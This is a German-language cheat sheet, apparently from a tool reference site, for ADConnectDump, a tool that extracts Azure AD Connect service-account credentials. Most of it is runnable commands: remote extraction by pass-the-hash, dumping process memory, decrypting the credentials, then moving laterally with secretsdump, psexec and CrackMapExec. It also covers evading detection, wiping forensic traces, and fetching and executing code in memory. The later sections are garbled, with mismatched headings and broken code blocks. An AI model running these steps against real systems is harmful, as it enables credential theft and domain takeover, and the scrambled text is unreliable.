Zum Inhalt

ADConnectDump Azure AD Connect Credential Extraction Tool Cheat Sheet

Überblick

ADConnectDump ist ein von Dirk-Jan Mollema entwickeltes Tool zum Extrahieren von Anmeldeinformationen und Konfigurationen von Azure AD Connect-Servern. Es kann die Dienstkonto-Anmeldeinformationen von Azure AD Connect extrahieren, die oft hohe Berechtigungen sowohl in der lokalen Active Directory- als auch in der Azure AD-Umgebung haben.

⚠️ Warnung: Dieses Tool ist ausschließlich für autorisierte Penetrationstests und Sicherheitsbewertungen vorgesehen. Stellen Sie sicher, dass Sie eine entsprechende Autorisierung haben, bevor Sie es in einer Umgebung verwenden.

Installation

PowerShell-Modul-Installation

# Download from GitHub
Invoke-WebRequest -Uri "https://raw.githubusercontent.com/fox-it/adconnectdump/master/adconnectdump.py" -OutFile "adconnectdump.py"

# Install Python dependencies
pip install impacket cryptography

# Alternative: Clone repository
git clone https://github.com/fox-it/adconnectdump.git
cd adconnectdump
pip install -r requirements.txt

Manuelle Installation

# Clone repository
git clone https://github.com/fox-it/adconnectdump.git
cd adconnectdump

# Install dependencies
pip3 install impacket cryptography pyasn1

# Make executable
chmod +x adconnectdump.py

Docker-Installation

# Build Docker image
git clone https://github.com/fox-it/adconnectdump.git
cd adconnectdump
docker build -t adconnectdump .

# Run in Docker
docker run -it -v $(pwd):/data adconnectdump

Grundlegende Nutzung

Lokale Anmeldeinformationen-Extraktion

# Extract credentials from local AAD Connect server
python3 adconnectdump.py

# Extract with specific database
python3 adconnectdump.py --database "C:\Program Files\Microsoft Azure AD Sync\Data\ADSync.mdf"

# Extract with custom output
python3 adconnectdump.py --output credentials.txt

# Extract in JSON format
python3 adconnectdump.py --format json --output credentials.json

Remote-Anmeldeinformationen-Extraktion

# Extract from remote server
python3 adconnectdump.py --host 192.168.1.100 --username administrator --password password

# Extract using NTLM hash
python3 adconnectdump.py --host 192.168.1.100 --username administrator --hashes :ntlmhash

# Extract using Kerberos
python3 adconnectdump.py --host 192.168.1.100 --username administrator --password password --use-kerberos

# Extract with domain credentials
python3 adconnectdump.py --host 192.168.1.100 --username domain\\administrator --password password

Befehlsreferenz

Grundlegende Optionen

Option Beschreibung
--host Ziel-Hostname oder IP
--username Benutzername zur Authentifizierung
--password Passwort zur Authentifizierung
--hashes NTLM-Hashes (LM:NT-Format)
--database Pfad zur ADSync-Datenbank
--output Ausgabedateipfad
### Erweiterte Optionen
Option Beschreibung
-------- -------------
--format Ausgabeformat (text/json)
--use-kerberos Verwenden Sie Kerberos-Authentifizierung
--dc-ip Domain Controller IP
--target-ip Ziel-IP-Adresse
--port Zielport (Standard 445)
--debug Debug-Ausgabe aktivieren
## Azure AD Connect-Architektur

Verstehen von AAD Connect

# Azure AD Connect components:
# 1. Synchronization Service (ADSync)
# 2. Database (LocalDB or SQL Server)
# 3. Service Accounts
# 4. Configuration Data

# Key files and locations:
# Database: C:\Program Files\Microsoft Azure AD Sync\Data\ADSync.mdf
# Config: C:\Program Files\Microsoft Azure AD Sync\Bin\
# Logs: C:\ProgramData\AADConnect\

Dienstkonto-Identifikation

# Identify AAD Connect service accounts
Get-Service|Where-Object \\\\{$_.Name -like "*ADSync*"\\\\}

# Check service account privileges
Get-WmiObject -Class Win32_Service|Where-Object \\\\{$_.Name -eq "ADSync"\\\\}|Select-Object StartName

# Verify AAD Connect installation
Get-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Azure AD Connect" -Name "Version"

Techniken zur Anmeldeinformationen-Extraktion

Lokaler Datenbankzugriff

# Direct database access (requires local admin)
python3 adconnectdump.py --database "C:\Program Files\Microsoft Azure AD Sync\Data\ADSync.mdf"

# Extract from backup database
python3 adconnectdump.py --database "C:\Backup\ADSync_backup.mdf"

# Extract from SQL Server instance
python3 adconnectdump.py --sql-server "SQLSERVER\INSTANCE" --database "ADSync"

Remote-Extraktion über SMB

# Extract via SMB with credentials
python3 adconnectdump.py --host aadconnect.domain.com --username "domain\admin" --password "password"

# Extract using pass-the-hash
python3 adconnectdump.py --host aadconnect.domain.com --username "admin" --hashes ":aad3b435b51404eeaad3b435b51404ee:hash"

# Extract with specific target IP
python3 adconnectdump.py --host aadconnect.domain.com --target-ip 192.168.1.100 --username "admin" --password "password"

Speicher-Extraktion

# Extract from memory (requires admin privileges)
# Use tools like Mimikatz or ProcDump

# Dump ADSync process memory
procdump.exe -ma miiserver.exe aadsync_dump.dmp

# Extract credentials from memory dump
python3 adconnectdump.py --memory-dump aadsync_dump.dmp

Konfigurationsanalyse

Datenbankschema-Analyse

-- Key tables in ADSync database
-- mms_management_agent: Contains connector information
-- mms_server_configuration: Server configuration
-- mms_synchronization_rule: Sync rules
-- mms_metaverse_object: Metaverse objects

-- Extract connector information
SELECT ma_name, ma_type, private_configuration_xml
FROM mms_management_agent;

-- Extract server configuration
SELECT applied_time, configuration_xml
FROM mms_server_configuration;

Konfigurationsdatei-Analyse

# Analyze AAD Connect configuration files
$configPath = "C:\Program Files\Microsoft Azure AD Sync\Bin\"

# Check connector configurations
Get-ChildItem -Path $configPath -Filter "*.xml"|ForEach-Object \\\\{
    [xml]$config = Get-Content $_.FullName
    Write-Host "File: $($_.Name)"
    Write-Host "Connectors: $($config.SelectNodes('//connector').Count)"
\\\\}

# Extract service account information
$serviceConfig = Get-Content "$configPath\miiserver.exe.config"
$serviceConfig|Select-String -Pattern "connectionString\|serviceAccount"

Anmeldeinformationen-Entschlüsselung

Verschlüsselung verstehen

# AAD Connect credential encryption process
# 1. Credentials encrypted with DPAPI
# 2. Machine key used for encryption
# 3. Service account context required

# Decryption process
import base64
from cryptography.fernet import Fernet

def decrypt_aad_connect_password(encrypted_password, key):
    """Decrypt AAD Connect password"""
    try:
        # Base64 decode
        encrypted_data = base64.b64decode(encrypted_password)

        # Decrypt using key
        f = Fernet(key)
        decrypted = f.decrypt(encrypted_data)

        return decrypted.decode('utf-8')
    except Exception as e:
        print(f"Decryption failed: \\\\{e\\\\}")
        return None

Manuelle Entschlüsselung

# Manual credential decryption (PowerShell)
Add-Type -AssemblyName System.Security

function Decrypt-AADConnectPassword \\\\{
    param(
        [string]$EncryptedPassword,
        [byte[]]$Key
    )

    try \\\\{
        # Convert from base64
        $encryptedBytes = [Convert]::FromBase64String($EncryptedPassword)

        # Decrypt using DPAPI
        $decryptedBytes = [System.Security.Cryptography.ProtectedData]::Unprotect(
            $encryptedBytes,
            $null,
            [System.Security.Cryptography.DataProtectionScope]::LocalMachine
        )

        return [System.Text.Encoding]::UTF8.GetString($decryptedBytes)
    \\\\}
    catch \\\\{
        Write-Error "Decryption failed: $_"
        return $null
    \\\\}
\\\\}

Post-Exploitation-Techniken

Verwendung extrahierter Anmeldeinformationen

# Use extracted Azure AD credentials
# Typically format: MSOL_<guid>@<tenant>.onmicrosoft.com

# Authenticate to Azure AD
az login --username "MSOL_12345678-1234-1234-1234-123456789012@company.onmicrosoft.com" --password "extracted_password"

# Use with AADInternals
Import-Module AADInternals
$accessToken = Get-AADIntAccessTokenForAADGraph -UserPrincipalName "MSOL_account@company.onmicrosoft.com" -Password "extracted_password"

Zugriff auf lokales Active Directory

# Use extracted on-premises credentials
# Format: domain\username

# Authenticate to domain
net use \\dc.domain.com\c$ /user:domain\MSOL_service_account extracted_password

# Use with Impacket tools
python3 secretsdump.py domain/MSOL_service_account:extracted_password@dc.domain.com

# Use with CrackMapExec
crackmapexec smb dc.domain.com -u MSOL_service_account -p extracted_password

Berechtigungserweiterung```powershell

Check privileges of extracted account

Import-Module ActiveDirectory Get-ADUser -Identity "MSOL_service_account" -Properties MemberOf|Select-Object -ExpandProperty MemberOf

Check Azure AD privileges

Import-Module AADInternals $roles = Get-AADIntUserRoles -AccessToken $accessToken -UserPrincipalName "MSOL_account@company.onmicrosoft.com" ## Erkennung Umgehungbash

Use legitimate tools and processes

Avoid suspicious file names

Use memory-only techniques when possible

Rename tool

cp adconnectdump.py system_maintenance.py

Use legitimate paths

mkdir -p /tmp/.system/maintenance/ cp adconnectdump.py /tmp/.system/maintenance/syscheck.py ### Anti-Forensikbash

Clear evidence after extraction

rm -f credentials.txt rm -f credentials.json history -c

Use in-memory execution

python3 -c " import urllib.request exec(urllib.request.urlopen('https://raw.githubusercontent.com/fox-it/adconnectdump/master/adconnectdump.py').read()) " ### Timing und Planungbash

Perform extraction during maintenance windows

Schedule for off-hours

Use legitimate administrative sessions

Example: Schedule extraction

echo "0 2 * * 0 /usr/bin/python3 /tmp/adconnectdump.py --output /tmp/.cache/system.log"|crontab - ## Defensive Maßnahmenpowershell

Monitor AAD Connect database access

Enable SQL Server auditing

Monitor file system access to ADSync.mdf

PowerShell monitoring script

$databasePath = "C:\Program Files\Microsoft Azure AD Sync\Data\ADSync.mdf" $watcher = New-Object System.IO.FileSystemWatcher $watcher.Path = Split-Path $databasePath $watcher.Filter = "ADSync.mdf" $watcher.EnableRaisingEvents = $true

Register-ObjectEvent -InputObject $watcher -EventName "Changed" -Action \\{ Write-EventLog -LogName "Application" -Source "AADConnect Monitor" -EventId 1001 -Message "ADSync database accessed" \\} ### Überwachung und Erkennungpowershell

Secure AAD Connect server

1. Restrict local admin access

2. Enable advanced auditing

3. Use dedicated service accounts

4. Implement network segmentation

5. Regular security updates

Enable auditing

auditpol /set /subcategory:"File System" /success:enable /failure:enable auditpol /set /subcategory:"Logon" /success:enable /failure:enable auditpol /set /subcategory:"Process Creation" /success:enable ### Härtungsempfehlungenbash

!/bin/bash

Automated ADConnectDump script

TARGET_HOST="\(1" USERNAME="\)2" PASSWORD="$3" OUTPUT_DIR="./adconnect_output"

if [ $# -ne 3 ]; then echo "Usage: $0 " exit 1 fi

Create output directory

mkdir -p "$OUTPUT_DIR"

Extract credentials

echo "Extracting AAD Connect credentials from \(TARGET_HOST..." python3 adconnectdump.py \ --host "\)TARGET_HOST" \ --username "\(USERNAME" \ --password "\)PASSWORD" \ --format json \ --output "\(OUTPUT_DIR/credentials_\)(date +%Y%m%d_%H%M%S).json"

Check if extraction was successful

if [ $? -eq 0 ]; then echo "Extraction completed successfully" echo "Output saved to $OUTPUT_DIR" else echo "Extraction failed" exit 1 fi ## Automatisierung und Scriptingpowershell

PowerShell automation script

param( [string]\(TargetHost, [string]\)Username, [string]\(Password, [string]\)OutputPath = ".\adconnect_output" )

Create output directory

New-Item -ItemType Directory -Path $OutputPath -Force|Out-Null

Extract credentials

$timestamp = Get-Date -Format "yyyyMMdd_HHmmss" $outputFile = Join-Path \(OutputPath "credentials_\)timestamp.json"

Write-Host "Extracting AAD Connect credentials from $TargetHost..."

$process = Start-Process -FilePath "python3" -ArgumentList @( "adconnectdump.py", "--host", $TargetHost, "--username", $Username, "--password", $Password, "--format", "json", "--output", $outputFile ) -Wait -PassThru -NoNewWindow

if ($process.ExitCode -eq 0) \\{ Write-Host "Extraction completed successfully" Write-Host "Output saved to $outputFile"

# Parse and display results
$credentials = Get-Content $outputFile|ConvertFrom-Json
Write-Host "Extracted $($credentials.Count) credential(s)"

\\} else \\{ Write-Error "Extraction failed with exit code \((\)process.ExitCode)" \\} ### Automatisiertes Extraktionsskriptbash

Database access denied

Solution: Ensure proper privileges or use alternative extraction method

Network connectivity issues

Solution: Check firewall rules and network connectivity

ping aadconnect.domain.com telnet aadconnect.domain.com 445

Authentication failures

Solution: Verify credentials and domain trust

net use \aadconnect.domain.com\c$ /user:domain\username password ### PowerShell Automatisierungbash

Enable debug output

python3 adconnectdump.py --debug --host aadconnect.domain.com --username admin --password password

Verbose logging

python3 adconnectdump.py -v --host aadconnect.domain.com --username admin --password password

Test connectivity

python3 adconnectdump.py --test-connection --host aadconnect.domain.com ## Fehlerbehebungpowershell

Verify AAD Connect installation

Get-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Azure AD Connect"

Check service status

Get-Service -Name "ADSync"

Verify database location

$regPath = "HKLM:\SOFTWARE\Microsoft\Microsoft SQL Server\MSSQL13.LOCALDB\MSSQLServer" Get-ItemProperty -Path $regPath -Name "DefaultData" ### Häufige Problemebash

Use extracted credentials with Impacket

python3 secretsdump.py domain/extracted_user:extracted_password@dc.domain.com

Use with GetUserSPNs

python3 GetUserSPNs.py domain/extracted_user:extracted_password -dc-ip dc.domain.com

Use with psexec

python3 psexec.py domain/extracted_user:extracted_password@target.domain.com ### Debug-Moduspowershell

Use extracted credentials for BloodHound collection

Import-Module SharpHound Invoke-BloodHound -CollectionMethod All -Domain domain.com -LDAPUser extracted_user -LDAPPass extracted_password ### Manuelle Überprüfungbash

Use extracted credentials with CrackMapExec

crackmapexec smb 192.168.1.0/24 -u extracted_user -p extracted_password

Check for local admin access

crackmapexec smb 192.168.1.0/24 -u extracted_user -p extracted_password --local-auth

Execute commands

crackmapexec smb target.domain.com -u extracted_user -p extracted_password -x "whoami" ```## Integration mit anderen Tools https://github.com/fox-it/adconnectdump##

Impacket Integration

https://blog.fox-it.com/2020/11/11/azure-ad-connect-database-exploit-priv-esc/##

BloodHound Integration

https://docs.microsoft.com/en-us/azure/active-directory/hybrid/how-to-connect-configure-ad-ds-connector-account##

CrackMapExec Integration

https://dirkjanm.io/#

Ressourcen

https://docs.microsoft.com/en-us/azure/security/fundamentals/identity-management-best-practices- [ADConnectDump GitHub Repository](